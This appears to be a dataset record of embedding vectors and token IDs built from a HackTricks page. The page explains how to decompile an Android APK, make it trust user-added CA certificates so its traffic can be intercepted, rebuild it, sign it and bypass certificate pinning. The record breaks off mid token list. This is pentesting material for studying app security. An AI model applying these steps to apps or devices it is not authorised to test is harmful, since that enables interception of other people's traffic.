0.3558754622936249, -0.6754380464553833, -0.005192391108721495, -0.7469675540924072, -0.5360407829284668, 0.5996601581573486, -0.5264349579811096, 0.4357730448246002, -0.44631391763687134, -0.046982962638139725, 0.7800419926643372, 0.9210025668144226, -0.705513060092926, 0.4792141914367676, 0.6836181879043579, 0.7464144229888916, -0.10154377669095993, 0.7226647734642029, -0.16073954105377197, -0.12419978529214859, -0.06617364287376404, 0.4642256200313568, -0.45173153281211853, 0.599107563495636, 0.41121768951416016, -0.522016704082489, -0.8188973665237427, 0.12130602449178696, -0.18486905097961426, -0.05489976704120636, 0.17037777602672577, -0.5226190686225891, -0.023598311468958855, -0.38433733582496643, 0.30048590898513794, -0.7069469690322876, -0.40071189403533936, 1.0670981407165527, -0.6638707518577576, -0.21349632740020752, 0.8358299136161804, -0.24220281839370728, -0.0625801756978035, 0.02764466032385826, 0.3548031151294708, -0.21092773973941803, 1.1523404121398926, -0.09265443682670593, -0.4419797360897064, 0.22204114496707916, 0.2563108205795288, -0.22043387591838837, -0.005696958862245083, -0.6307618618011475, -0.16834935545921326, 0.19052378833293915, 0.11992654204368591, -1.1130964756011963, -0.5129082798957825, 0.22945401072502136, -0.09261922538280487, -0.9879176020622253, -0.22833038866519928, 0.11139663308858871, -0.787704586982727, 0.026818079873919487, 0.06677794456481934, -0.2915431559085846, -0.00070236372994259, -0.9649522304534912, -0.031571164727211, 0.5710798501968384, -0.3213176429271698, -0.6555580496788025, -0.2026025503873825, -0.47428619861602783, -0.33621907234191895, 0.39989525079727173, -0.44324660301208496, -0.5000735521316528, -0.3638288080692291, -0.2684590220451355, -0.011949745006859303, 0.7581115365028381, 0.12545044720172882, 0.18927524983882904, 0.8427640199661255, -0.5043794512748718, 0.4348475933074951, 0.0031932429410517216, 0.8766387104988098, -0.26625269651412964, 0.6083639860153198, 0.2612842321395874, -0.24287624657154083, 0.08696087449789047, 0.15310291945934296, 0.20958201587200165, -0.13453520834445953, -0.6325252056121826, -0.5392971634864807, 0.5353882908821106, -0.8128383159637451, -0.4620303511619568, 0.33043956756591797, 0.7211015224456787, -0.0565311424434185, -0.2507114112377167, -0.26043474674224854, 0.23412606120109558, -1.5009840726852417, 0.6258935332298279, -0.49249741435050964, -0.36888450384140015, 0.12960930168628693, -0.07400159537792206, -0.12968185544013977, -1.0890984535217285, 4.290859699249268, 0.841277539730072, 0.3695746064186096, 0.49717003107070923, 0.6643833518028259, 0.9665135741233826, 0.6887663006782532, -0.8350785374641418, -0.007838321849703789, -0.09217584133148193, -0.02317647449672222, 0.16203108429908752, 0.976866602897644, 0.503900408744812, -0.00966982264071703, -0.07741271704435349, -0.5960147976875305, 0.3725297749042511, 0.3152388036251068, -0.7114393711090088, -0.7718910574913025, -0.45200759172439575, -0.19136162102222443, 0.5954875946044922, 0.3044167160987854, 0.5489628314971924, -0.3493063449859619, -0.3559178113937378, -0.2898580729961395, -0.9690330624580383, 0.47868025302886963, -0.04344668611884117, 1.006015658378601, -0.3061683177947998, -0.013741588220000267, 0.6666333675384521, 0.2484116554260254, -0.35697054862976074, -0.31677886843681335, 0.9257371425628662, -0.06508560478687286, -0.6170433759689331, -0.07464447617530823, -0.4856939911842346, -0.4209223985671997, 0.2621133327484131, 0.2203906625509262, -0.164338156580925, 1.513279676437378, -0.10987652093172073, 0.2873285412788391, 0.1843966543674469, 0.026709429919719696, -0.2800784409046173, -0.16060444712638855, -0.27834153175354004, -0.11910329759120941, -0.04812433943152428, 0.13858453929424286, 0.027713332325220108, -0.11557308584451675, -0.3832312822341919, -0.5881140828132629, 0.14482381939888, -1.2385178804397583, 0.12022434920072556, -0.18730732798576355, 1.3549156188964844, -0.11110680550336838, -0.4157738983631134, 0.1445474624633789, 0.48715269565582275, 0.608138382434845, -0.4600721001625061, 0.3570576310157776, 0.005288482178002596, -0.4327094554901123, 0.7148599028587341, 0.2686622738838196, -0.9743460416793823, 0.2437964826822281, 0.028650108724832535, -0.4372161626815796, 0.2600932717323303, 1.2506842613220215, 0.4358796179294586, -0.2748779058456421, -0.5809804797172546, -0.7374173998832703, 0.2819097340106964, 0.01565079391002655, -0.015930121764540672, -0.47641634941101074, -0.2885574400424957, -0.07928138971328735 ]
[ 7661, 5679, 19496, 14028, 2389, 6971, 5403, 3600, 2065, 1996, 4646, 2003, 25719, 2151, 5415, 8778, 1013, 5679, 5403, 3600, 1996, 6207, 1011, 10439, 1011, 2609, 1011, 2523, 5371, 5403, 3600, 2065, 1996, 4646, 3475, 1005, 1056, 9361, 1998, 2624, 25090, 6774, 5198, 7953, 3081, 1996, 7661, 5679, 1998, 2070, 18130, 2064, 2022, 18516, 5403, 3600, 2065, 1996, 4646, 14451, 2015, 2151, 7591, 2895, 2008, 2064, 2022, 2170, 2013, 5973, 3081, 1996, 7661, 5679, 10179, 18908, 7730, 6631, 5403, 3600, 2065, 1996, 4646, 2064, 4374, 21318, 18908, 12848, 6447, 1998, 2065, 2009, 1005, 1055, 2825, 2000, 18077, 2151, 18130, 2007, 11974, 19275, 4023, 10179, 19707, 2618, 6277, 5403, 3600, 2065, 1996, 4646, 2065, 24731, 2505, 2000, 1996, 2236, 19351, 6277, 5403, 3600, 2065, 1996, 4646, 2065, 2478, 1996, 2951, 2013, 1996, 2236, 19351, 6277, 2005, 2505, 8202, 15660, 1996, 19351, 6277, 2000, 2156, 2065, 2151, 7591, 2951, 2003, 15826, 29098, 14305, 2483, 1996, 4646, 2478, 2151, 5331, 1029, 4773, 8584, 22842, 3600, 2029, 2785, 1997, 4773, 8584, 2015, 2024, 2108, 2109, 5403, 3600, 1996, 3570, 1997, 9262, 22483, 8189, 23242, 1010, 9262, 22483, 23803, 11837, 11101, 15568, 4887, 20389, 12070, 3973, 1010, 2038, 2239, 2135, 3366, 23887, 8663, 6528, 10649, 11012, 2065, 1996, 4773, 8584, 2064, 3229, 2334, 6764, 2007, 1996, 8778, 5371, 1024, 1013, 1013, 1006, 3499, 8873, 19738, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1010, 3499, 19496, 14028, 7911, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1007, 4638, 2065, 9262, 22483, 2064, 3229, 3128, 4725, 1006, 1046, 9363, 10111, 18413, 1010, 2695, 7834, 3736, 3351, 1007, 2897, 4807, 4842, 14192, 1037, 10210, 2213, 2000, 1996, 4807, 1998, 3945, 2005, 4773, 24728, 19666, 6906, 14680, 1012, 4638, 2065, 1996, 3677, 18442, 1997, 1996, 8196, 2003, 7039, 5403, 3600, 1013, 11826, 8196, 22866, 15630, 9468, 5369, 3600, 2005, 6882, 8983, 2075, 1013, 2039, 16616, 10595, 5403, 3600, 2005, 24391, 2353, 2283, 8860, 2224, 7577, 4355, 2000, 4089, 3857, 1998, 8285, 8585, 2147, 12314, 2015, 6113, 2011, 1996, 2088, 1005, 1055, 2087, 3935, 2451, 5906, 1012, 102 ]
hack_tricks
42.txt
1
[CLS] make apk accept ca certificatefind vulnerabilities that matter most so you can fix them faster. intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from apis to web apps and cloud systems. try it for free today. intruder | an effortless vulnerability scannersome applications don't like user downloaded certificates, so in order to inspect web traffic for some apps we actually have to decompile the application & add a few things & recompile it. automaticthe tool url will automatically make the necessary changes to the application to start capturing the requests and will also disable certificate pinning ( if any ). manualfirst we decompile the app : apktool d * file - name *. apkthen we go into the manifest. xml file & scroll down to the < \ application android > tag & we are going to add the following line if it isn't already there : android : networksecurityconfig = " @ xml / network _ security _ configbefore adding : after adding : now go into the res / xml folder & create / modify a file named network _ security _ config. xml with the following contents : < network - security - config > < base - config > < trust - anchors > <! - - trust preinstalled cas - - > < certificates src = " system " / > <! - - additionally trust user added cas - - > < certificates src = " user " / > < / trust - anchors > < / base - config > < / network - security - config > then save the file & back out of all the directories & rebuild the apk with the following command : apktool b * folder - name / * - o * output - file. apk * finally, you need just to sign the new application. read this section of the page smali - decompiling / [ modifying ] / compiling to learn how to sign it. find vulnerabilities that matter most so you can fix them faster. intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from apis to web apps and cloud systems. try it for free today. intruder | an effortless vulnerability scanner [SEP]
[ 0.12077785283327103, 0.213191419839859, -0.6276003122329712, 0.20301733911037445, -0.2276173084974289, 0.08757239580154419, -0.4739525318145752, -0.019121766090393066, 0.72563236951828, 0.7068283557891846, 0.10842850804328918, 0.20910416543483734, 0.9312028288841248, -1.035488486289978, -0.8633580803871155, 0.3713420033454895, 0.07750238478183746, -0.3444039225578308, -0.26396334171295166, -0.04626554250717163, 0.5404192209243774, 0.008078575134277344, -0.726209819316864, -0.48234447836875916, -0.3374749720096588, 0.5244743227958679, 0.2220984846353531, 0.16876950860023499, 0.6660230755805969, 0.8170343041419983, -0.28202101588249207, 0.38771557807922363, 0.025509845465421677, -0.3040674924850464, 0.12279271334409714, -0.16970132291316986, 0.3629775047302246, -0.5023946166038513, -0.7189967632293701, -0.4650156497955322, -0.006534254644066095, 0.0012348914751783013, 0.8130059838294983, -0.7342994809150696, -0.4334677755832672, -0.16284263134002686, -0.7694615125656128, -0.21432746946811676, 0.01141158677637577, -0.34588488936424255, -0.2152102142572403, 0.607628345489502, 0.21658018231391907, -0.17291121184825897, 0.08216121047735214, 0.1522948145866394, -0.40628138184547424, -0.1449662148952484, -0.04575829207897186, -0.3617989122867584, -0.26003941893577576, 0.3244386315345764, -0.07298041880130768, -0.6419249773025513, -0.08599191904067993, 0.6399756669998169, -0.2531951367855072, -0.38762202858924866, 0.06235908716917038, -0.8498812913894653, -0.5437260270118713, 0.8042023181915283, -0.3533068001270294, -0.9419503808021545, -0.11311924457550049, -0.04556342959403992, 0.32639917731285095, 0.124623142182827, 0.0733717530965805, 0.7512111663818359, -0.23319126665592194, 0.8035876750946045, 0.41746005415916443, -0.6029771566390991, -0.23129567503929138, -0.29029977321624756, 0.9915189743041992, 0.2998712658882141, -0.14270316064357758, 0.16323639452457428, 0.1163000836968422, 1.1137882471084595, -0.37898653745651245, -0.10170648992061615, -0.10624974966049194, 0.7879717946052551, -0.8740920424461365, -0.19162434339523315, 1.2038156986236572, 0.1475204974412918, 0.5144022107124329, -0.025704825296998024, -0.34221670031547546, 0.33344265818595886, -0.16258034110069275, 0.8092100620269775, 0.4849347770214081, -0.610339343547821, -0.6801974177360535, -0.4864713251590729, 0.6658145189285278, 0.23796382546424866, -0.6532958149909973, -0.10626145452260971, -0.137400284409523, 0.23219965398311615, -0.3907025456428528, 0.4400450885295868, -0.5274369120597839, -0.3172713816165924, 0.0615287721157074, 0.2669302225112915, 0.6727124452590942, -0.5305700898170471, -0.5420434474945068, -0.20653969049453735, 0.15195538103580475, 0.9331689476966858, -0.5824092626571655, 0.49329298734664917, -0.535128653049469, 0.5240098834037781, 0.07985320687294006, 0.4912627935409546, -0.5766175389289856, -0.2013176530599594, 0.1825847625732422, 0.015359992161393166, 1.0318865776062012, -0.07864627987146378, -0.6023112535476685, 0.3065866529941559, 0.38192471861839294, 1.5360232591629028, -0.45938220620155334, 0.18627136945724487, 0.09196151793003082, -0.12917354702949524, -0.3127062916755676, 0.39899882674217224, -0.07731013745069504, 0.1304231435060501, 1.0076030492782593, -0.13105203211307526, -0.07004137337207794, 0.20488718152046204, -0.570367693901062, 0.38078388571739197, 0.06853636354207993, -0.11522559076547623, 0.15053687989711761, 0.6841667294502258, -0.4861094057559967, 0.8678584098815918, 0.15603390336036682, 1.0413495302200317, -0.5063254237174988, -0.8653383851051331, 0.6793227791786194, 0.07175690680742264, 0.5484409928321838, -0.19803451001644135, 0.12941794097423553, 0.3189655542373657, 0.833454966545105, -0.08700921386480331, 0.1367550492286682, -0.04286057874560356, 0.42473822832107544, 0.34372463822364807, -0.3297370374202728, -0.15600937604904175, 0.3425199091434479, 0.6236411929130554, -0.029876943677663803, 0.7188283205032349, 0.48431527614593506, -0.4937836825847626, -0.14057032763957977, -0.5409752726554871, 0.02429484948515892, 0.26396650075912476, -0.3806415796279907, 0.5727508068084717, 0.02632736973464489, -0.39114516973495483, -0.8563506007194519, -0.04846764728426933, 0.5245499610900879, -0.7120983600616455, 0.21444419026374817, -0.000019192724721506238, -0.23177549242973328, 0.3042900860309601, -0.7122324705123901, -0.6178523898124695, 0.12029454857110977, 0.9732317924499512, -0.363896906375885, -0.16136033833026886, 0.8957729339599609, 0.16193072497844696, -0.5160124897956848, -0.6084624528884888, 0.7448479533195496, 0.20063549280166626, 0.16965262591838837, 0.2726086378097534, 0.6921430230140686, -0.15139995515346527, 0.063727006316185, 0.3811400234699249, -0.015388617292046547, -0.6684608459472656, -0.09191834926605225, 0.14631690084934235, -0.3733372986316681, -0.12543964385986328, -0.5740609765052795, -0.32002317905426025, 0.3125017583370209, 0.14297841489315033, -0.432806134223938, 0.8163843750953674, 0.49687856435775757, 0.48217469453811646, 0.46824541687965393, -0.18980112671852112, -0.026674671098589897, 0.521723210811615, 0.09372401982545853, 1.3914262056350708, -0.20302651822566986, 0.2353978008031845, -0.11999072134494781, -0.3873012959957123, -0.37092190980911255, 0.2552166283130646, -0.5130826830863953, 0.09887834638357162, -0.25737762451171875, 1.04909348487854, 0.02954564243555069, 0.3471145033836365, 0.1327594518661499, 0.2133210450410843, 0.6510105729103088, 0.4117823541164398, -0.7533886432647705, 0.007433920633047819, -0.044175829738378525, -0.11513012647628784, -0.04277627915143967, -0.37016114592552185, -0.07733909785747528, 0.6564937233924866, 0.4378315806388855, -0.15421776473522186, -0.3457435667514801, 0.11570560932159424, -0.6764089465141296, -0.29391077160835266, -0.5749884843826294, -0.4201401472091675, -0.9492068290710449, 0.26756998896598816, 0.05665256083011627, -1.0760407447814941, 0.17309217154979706, -0.9646791219711304, 0.1164051815867424, 0.4540052115917206, 0.18042747676372528, 1.4021393060684204, -0.07378172874450684, 0.7160535454750061, -0.4973023235797882, 0.3360757529735565, 0.4293433725833893, 0.3125322759151459, -0.2883719801902771, -0.44689157605171204, 0.24553343653678894, -0.19789348542690277, 0.02089395932853222, -0.4613123834133148, 0.2410205751657486, -0.2936655879020691, -0.2026909589767456, 0.13039006292819977, -0.013480513356626034, -0.2951831519603729, -0.03171715885400772, -0.2335198074579239, 0.16330620646476746, 0.3473843038082123, 0.1607997864484787, -0.09514682739973068, 1.0155606269836426, 0.44045400619506836, -0.22383543848991394, 0.7718889117240906, -0.2151164561510086, 0.2531588673591614, -0.5314858555793762, 0.7332202792167664, 0.4851955771446228, -0.012085984461009502, -0.48803189396858215, -1.0382441282272339, -0.055788252502679825, 0.02429707907140255, -0.9993442893028259, -0.14927326142787933, 0.2462899535894394, 0.8136081695556641, 0.2799161374568939, -1.2341833114624023, 0.4878399074077606, -0.6264063715934753, 0.3777885138988495, -0.18331415951251984, 0.26961129903793335, 0.6976437568664551, 0.40155231952667236, 0.19569441676139832, -0.6674267053604126, -0.18528150022029877, -0.525555431842804, 0.03719097375869751, 0.2623351216316223, -0.648928701877594, 1.5804823637008667, -0.18435296416282654, -0.2555808424949646, -0.22028417885303497, 0.03057047724723816, -0.5374228358268738, -0.03737585246562958, 0.17154794931411743, -1.1856542825698853, -0.19568204879760742, -0.39492303133010864, -0.6088767051696777, 0.6227062344551086, 0.8450321555137634, -0.891636073589325, 0.018847975879907608, 0.4639180600643158, -0.14353737235069275, -0.10778266936540604, 0.4755685031414032, 0.23408378660678864, -0.43600496649742126, 0.02095627225935459, -0.7634497880935669, -0.12494373321533203, 0.2717846632003784, 0.929419994354248, -0.5499995946884155, 0.22316676378250122, -0.03414468839764595, -0.5684097409248352, 0.4440614879131317, -0.54544997215271, -0.0682728961110115, 0.8267543911933899, -0.15108443796634674, 0.6239842176437378, -0.15846794843673706, -0.011923451907932758, 0.1293679028749466, 0.11362844705581665, 0.5851219296455383, 0.06621064990758896, -0.7925610542297363, -0.8585388660430908, 0.009111471474170685, -0.4310116171836853, -0.18852606415748596, 0.040549032390117645, 0.3135016858577728, 0.4259479343891144, 0.1601286232471466, -0.6228924989700317, -0.6377586722373962, 0.3191796839237213, 0.36778315901756287, 0.241668239235878, 0.5484266877174377, 0.5263394117355347, 0.3853127062320709, 0.2854093313217163, 0.8402997851371765, -0.18677151203155518, 0.2166670262813568, -0.00658800732344389, 0.39555153250694275, -0.6737810969352722, -0.10485095530748367, -0.48583853244781494, -0.2025105506181717, -0.005150587763637304, 0.3931099474430084, -0.6167031526565552, 0.06579207628965378, 0.02279396913945675, -0.12547153234481812, 0.06162778288125992, 0.6206597089767456, -0.05410271883010864, -0.5726709961891174, -0.7742117047309875, 0.31743481755256653, 0.7038502097129822, -0.7185878157615662, -0.1935570240020752, -0.2813931405544281, -0.11971970647573471, 0.05359786003828049, -0.1819954812526703, -0.3677694797515869, -0.47870922088623047, -0.8635892868041992, -0.8959845900535583, 0.5667420029640198, 0.4438619315624237, 0.15175750851631165, 0.1652708500623703, -0.8147135972976685, 0.2360064536333084, 0.19043326377868652, -0.14071711897850037, -0.5506367683410645, -0.392984002828598, 0.418272465467453, 0.6477600932121277, 0.6635242700576782, -0.17034681141376495, -0.016894781962037086, 0.2381957471370697, -0.6075108051300049, 0.3847344219684601, -0.7491175532341003, -0.617137610912323, -0.2297857105731964, 0.8517391085624695, 0.04345036298036575, 0.3668461740016937, -0.4773629605770111, 0.21405625343322754, 0.02738986164331436, -0.006543500814586878, -0.5136436223983765, -0.5073813796043396, -0.11925727128982544, -0.47739773988723755, 0.3151260018348694, 1.0924454927444458, 0.05744780972599983, 0.2717461884021759, 0.42477428913116455, 0.0986664667725563, -0.7251883149147034, 0.2097352296113968, -0.30037662386894226, 0.16598020493984222, 0.3274405002593994, -0.1720556765794754, -0.0027619730681180954, -1.034980058670044, 0.9608789682388306, -0.34417328238487244, -0.4324551224708557, -0.6287717819213867, -0.8093823790550232, 0.0777575746178627, -0.3509538173675537, 0.09999924898147583, 1.377463936805725, 0.10345222055912018, -0.297015905380249, 0.19153954088687897, 0.25849026441574097, -0.009307247586548328, 0.20438696444034576, 0.08961416035890579, -1.0898407697677612, 0.5547136068344116, 0.04044089838862419, 0.5036651492118835, -0.003177354345098138, -0.8910886645317078, -0.22931306064128876, 0.5170238614082336, 0.11208448559045792, -0.35770270228385925, 0.6152987480163574, 0.6378897428512573, -0.593461811542511, -0.9731945395469666, 0.751713216304779, -1.00967538356781, -0.20177176594734192, 0.5186548233032227, 0.2717972695827484, 0.2969808876514435, -0.12209979444742203, -0.731937050819397, -0.114883191883564, 0.7128748297691345, -0.9424729943275452, -0.2308320850133896, 0.10355587303638458, 0.1403241753578186, 0.8849844336509705, 0.6093116998672485, -0.43730559945106506, -0.621873140335083, -0.08392173796892166, 0.6369282007217407, -0.6904455423355103, -0.6925415396690369, -0.35310930013656616, -0.5928047895431519, -0.23131777346134186, 0.9630289077758789, 0.27910369634628296, -0.6373977661132812, -0.21625694632530212, -0.6420479416847229, 0.32293397188186646, -0.18729865550994873, -0.10195747017860413, -0.18554088473320007, -0.0025744708254933357, 0.4315020442008972, 1.279443621635437, 0.16023510694503784, 0.3241710066795349, 0.20377960801124573, 0.4992746114730835, 0.7819269299507141, 0.061100032180547714, -1.1496628522872925, -0.5201829075813293, 0.0796656534075737, 0.26230213046073914, -0.763720691204071, 0.7928847670555115, -0.8657394647598267, 0.10863672196865082, 0.2377932071685791, 0.07560636103153229, -0.6015239953994751, 0.8561602234840393, -0.43908682465553284, -0.03589063510298729, 0.6252242922782898, -0.1881779283285141, 0.184019535779953, -0.2795245349407196, 0.02226841263473034, -0.3894002139568329, 0.21974460780620575, -0.3347402513027191, 0.09165529906749725, -0.9865784645080566, -0.5719690322875977, 0.62060546875, -0.1891123652458191, -0.11698184907436371, -0.5857390761375427, -0.4815731346607208, -0.2363961637020111, -0.33311980962753296, -0.549373209476471, 0.7337222099304199, -0.09070394933223724, -0.16792501509189606, -1.4573543071746826, 0.32633206248283386, 0.6716083288192749, -0.49315187335014343, -0.6197533011436462, 0.03395027667284012, 0.12140239030122757, -0.10416398197412491, 0.13310514390468597, -0.45260441303253174, 0.3915695548057556, 0.09648849070072174, 0.711724579334259, -0.5768904685974121, 0.3701031506061554, 0.23185671865940094, -0.8141728043556213, 0.02733849175274372, -0.03218620643019676, 0.016555096954107285, 0.07897115498781204, 0.10196223855018616, 0.9628296494483948, 0.1713956594467163, 0.5612521767616272, 0.040938813239336014, 0.4132179021835327, 0.10645084828138351, 0.45206934213638306, -0.14562341570854187, -0.613091230392456, 0.20465289056301117, 0.9161475300788879, -0.5341810584068298, -1.103656530380249, -0.09358461201190948, 0.047904662787914276, -0.28343117237091064, 0.0743396058678627, -0.23739765584468842, -0.4416411221027374, -0.6760556101799011, 0.19205231964588165, 0.6138622760772705, 0.10560974478721619, 0.16303570568561554, -0.15613506734371185, 0.4608066976070404, -0.12220051884651184, 0.0738741010427475, 0.6954798698425293, -0.043814077973365784, -0.3471359610557556, -0.6184042692184448, -0.1261865794658661, -0.10842518508434296, 0.14076325297355652, 0.6582240462303162, -0.2076566368341446, -0.07424108684062958, 0.159654900431633, 0.3615175783634186, 0.9464365243911743, -0.10810085386037827, 0.6904386878013611, 0.8892921805381775, -0.5833650231361389, -0.795484721660614, -0.37451085448265076, 0.07078272104263306, -0.5114912390708923, 0.7177114486694336, -0.11552335321903229, 0.31237688660621643, 0.4673205018043518, 0.6271201968193054, -0.4065924882888794, -0.6287062168121338, -0.05771377682685852, -0.6723964810371399, -0.4764443337917328, -0.11478447169065475, -0.327414870262146, -0.3124310076236725, 0.3323884606361389, -0.258819580078125, -0.19478242099285126, -0.2782605290412903, 0.7098419070243835, 0.4241774082183838, -0.3700861632823944, -0.9372345209121704, 0.08686116337776184, -0.2788901925086975, -1.2700331211090088, -0.6984341144561768, -0.23212362825870514, -0.1905537098646164, 0.008538968861103058, -0.6239680051803589, -0.053666483610868454, -0.27376025915145874, 0.6161130666732788, -0.8155889511108398, 0.16967004537582397, -0.5532911419868469, -0.1227513998746872, -0.3710395395755768, -0.21034559607505798, -0.31002137064933777, 0.5280779600143433, 0.3032017648220062, -0.7452322244644165, 0.628769040107727, 0.18290336430072784, 0.16157732903957367, -0.2039325088262558, -0.045350734144449234, -0.031214596703648567, -0.18911810219287872, 0.130332812666893, -0.7614780068397522, -0.4112086594104767, -0.7531018257141113, 0.08094437420368195, -0.7248935103416443, -0.6835281848907471, 0.01811099611222744, 0.57676100730896, -0.2571927011013031, 0.11833039671182632, -0.7778804898262024, 0.7646061778068542, 0.0759577602148056, 0.4833938181400299, 0.9313512444496155, 0.21268533170223236, 0.819450318813324, 0.6087251901626587, -0.23720037937164307, 0.43202346563339233, -0.08203297108411789, -0.024454183876514435, 0.17832522094249725, 0.6768754124641418, -0.4052917957305908, -0.04174299165606499, -0.7525097131729126, -0.02048705518245697, -0.23487043380737305, 0.329476922750473, -0.006307047791779041, -0.006440702825784683, 0.12826232612133026, 0.6307308673858643, 0.05474480986595154, -0.15788604319095612, -1.1704286336898804, -0.9774652719497681, 0.24579930305480957, -0.25142258405685425, -0.421888530254364, -0.2545773386955261, 0.25334104895591736, 0.21153250336647034, 0.19677916169166565, -0.6513075232505798, 0.18179671466350555, 0.6204452514648438, 0.713365912437439, 0.7133364677429199, 0.07382259517908096, 0.1478216052055359, -0.42195096611976624, 0.09570802003145218, -0.8162131905555725, -0.94625324010849, -0.29372748732566833, 1.699758529663086, 0.08588014543056488, -0.11519888043403625, -0.8748547434806824, 0.2383715808391571, 0.5121937990188599, 0.023004401475191116, 0.2936897873878479, 0.6512893438339233, -1.7055779695510864, 0.6829200983047485, -0.3478185832500458, 0.03973254933953285, -0.11673146486282349, 0.14218983054161072, 0.18653275072574615, -0.3908790051937103, -0.37844961881637573, 0.3061593174934387, 0.567611575126648, -0.4068978428840637, 0.7320546507835388, 0.0076375422067940235, 0.3230232894420624, -0.5871500372886658, -0.14619243144989014, -0.11513999104499817, 0.34364551305770874, 0.15758372843265533, 0.23332960903644562, -0.24566993117332458, 0.7092850804328918, 0.2768045961856842, -0.7518083453178406, -0.1932564228773117, 0.058052342385053635, -0.5181984305381775, -0.649498462677002, 0.6143086552619934, -0.6366613507270813, -0.5175138711929321, 0.15037484467029572, -0.8772852420806885, -0.4246382713317871, -0.28986072540283203, -0.2017149031162262, 0.14080840349197388, -0.3169434070587158, 0.5694229602813721, -0.7355554699897766, 0.41709208488464355, -0.039741408079862595, -0.8774274587631226, 1.0965352058410645, -0.013297857716679573, -0.5624406933784485, -0.32643982768058777, 0.703905463218689, 0.7671514749526978, 0.29744988679885864, 0.6846280694007874, -0.1383940726518631, 0.09392961114645004, -0.03003489226102829, -0.2944561839103699, -0.7163829207420349, -0.1310010850429535, 0.402179479598999, 0.2770206034183502, -0.37082237005233765, 0.4381181597709656, 0.16193608939647675, -0.16697056591510773, 0.2934987545013428, -0.5880424976348877, -0.377033531665802, -0.6125355958938599, 0.3321192264556885, -0.43164145946502686, -0.6307939887046814, 0.9689146876335144, -0.140347421169281, -0.9575190544128418, 0.8471253514289856, -0.17851178348064423, -0.2354721873998642, 0.28203877806663513, 0.6041809320449829, -0.40721893310546875, 0.903907060623169, 0.4084948003292084, -0.3316742181777954, 0.16728253662586212, -0.23436954617500305, -0.44794511795043945, -0.27823132276535034, -0.44365012645721436, -0.20825037360191345, 0.8498010039329529, -0.7505924105644226, -1.657478928565979, 0.20838986337184906, -0.011124508455395699, -0.056252773851156235, -0.6728805303573608, 0.9534963369369507, 0.3163100481033325, -0.6019591689109802, -0.4268929958343506, 0.8782264590263367, 0.1505168080329895, 0.3758764863014221, -1.0849146842956543, -0.3942597806453705, 0.03056482970714569, -0.18282949924468994, -0.5173389911651611, 0.14781923592090607, -0.5196887850761414, -0.5175482034683228, -0.2032000869512558, -0.18504181504249573, -0.5587672591209412, -0.3719329833984375, -0.060074832290410995, -0.18447385728359222, 0.2116614431142807, 0.5144838094711304, 0.4540637135505676, 0.6269234418869019, 0.17882300913333893, 0.27167418599128723, 0.4478088319301605, 1.1735625267028809, -0.09689140319824219, 0.8043687343597412, 0.08326169848442078, 0.1030055359005928, 0.5589557886123657, 0.10745780169963837, -0.1763201653957367, -0.20089620351791382, 0.21606063842773438, -0.3941395580768585, 0.03793906047940254, -0.7821906805038452, -0.4242105185985565, 0.49162057042121887, 0.6747897863388062, 0.05413023382425308, -0.1764151006937027, -0.2363327592611313, -0.02684657648205757, -1.1057727336883545, 0.031424615532159805, -0.5839016437530518, -0.695099413394928, -0.4433600902557373, -0.7729262709617615, 0.787189781665802, -0.8223482370376587, 4.315727233886719, 0.11301000416278839, 0.27773940563201904, 0.39169010519981384, 0.5714640021324158, 0.6543823480606079, 0.7251273393630981, -0.6283182501792908, -0.048099398612976074, -0.3589966595172882, 0.06946955621242523, -0.4074174165725708, 1.0469459295272827, 0.20332174003124237, -0.2355140894651413, 0.4489814341068268, -0.21186991035938263, -0.08123593777418137, 0.8442749381065369, -0.5049933791160583, -0.5304211378097534, 0.4662574231624603, -0.3376208543777466, 0.5231970548629761, 0.5082154273986816, 0.3961401581764221, 0.008764076977968216, -0.11179648339748383, -0.5423155426979065, -0.2445264756679535, 0.3443428874015808, -0.4623716473579407, 1.445971131324768, -0.3951660990715027, -0.5112066268920898, 0.43106138706207275, -0.2048681527376175, 0.025708191096782684, 0.17678193747997284, 0.025181209668517113, -0.18306291103363037, 0.23976463079452515, -0.15791216492652893, -0.49408474564552307, 0.6055921316146851, -0.084772028028965, 0.23682375252246857, -0.20386262238025665, 0.7881417274475098, -0.6646916270256042, -0.3673185110092163, -0.30357807874679565, 0.2574922740459442, -0.10454871505498886, -0.5547561645507812, -0.2376570701599121, -0.09378188103437424, 0.2626909017562866, 0.02382829412817955, -0.1531858593225479, -0.3017933666706085, -0.12983496487140656, -0.07870891690254211, -0.3451056182384491, -0.8527336716651917, -0.020685836672782898, 0.3138629198074341, 0.5150404572486877, -0.04854363575577736, -0.8234909772872925, 0.4721321761608124, -0.5777294039726257, -0.205525740981102, -0.2798304855823517, 0.37508371472358704, 0.6212186217308044, 0.09877163171768188, 0.41595566272735596, 0.35104209184646606, 0.17681510746479034, 0.10978315025568008, 0.4901711940765381, -0.6693804264068604, -0.15417690575122833, 1.0147508382797241, 0.5207219123840332, -0.373971551656723, 0.054741743952035904, -0.3581067621707916, 0.47058606147766113, 0.6138209700584412, 0.09378217905759811, -0.1879672408103943, -0.12926539778709412, 0.3075620234012604 ]
[ 101, 2191, 9706, 2243, 5138, 6187, 8196, 16294, 2094, 24728, 19666, 6906, 14680, 2008, 3043, 2087, 2061, 2017, 2064, 8081, 2068, 5514, 1012, 22841, 3162, 2115, 2886, 3302, 1010, 3216, 4013, 19620, 5081, 27404, 1010, 4858, 3314, 2408, 2115, 2878, 6627, 9991, 1010, 2013, 17928, 2015, 2000, 4773, 18726, 1998, 6112, 3001, 1012, 3046, 2009, 2005, 2489, 2651, 1012, 22841, 1064, 2019, 3947, 3238, 18130, 26221, 14045, 5097, 2123, 1005, 1056, 2066, 5310, 22817, 17987, 1010, 2061, 1999, 2344, 2000, 22459, 4773, 4026, 2005, 2070, 18726, 2057, 2941, 2031, 2000, 21933, 8737, 9463, 1996, 4646, 1004, 5587, 1037, 2261, 2477, 1004, 28667, 25377, 9463, 2009, 1012, 6882, 10760, 6994, 24471, 2140, 2097, 8073, 2191, 1996, 4072, 3431, 2000, 1996, 4646, 2000, 2707, 11847, 1996, 11186, 1998, 2097, 2036, 4487, 19150, 8196, 22866, 1006, 2065, 2151, 1007, 1012, 6410, 8873, 12096, 2057, 21933, 8737, 9463, 1996, 10439, 1024, 9706, 25509, 13669, 1040, 1008, 5371, 1011, 2171, 1008, 1012, 9706, 25509, 10222, 2057, 2175, 2046, 1996, 19676, 1012, 20950, 5371, 1004, 17186, 2091, 2000, 1996, 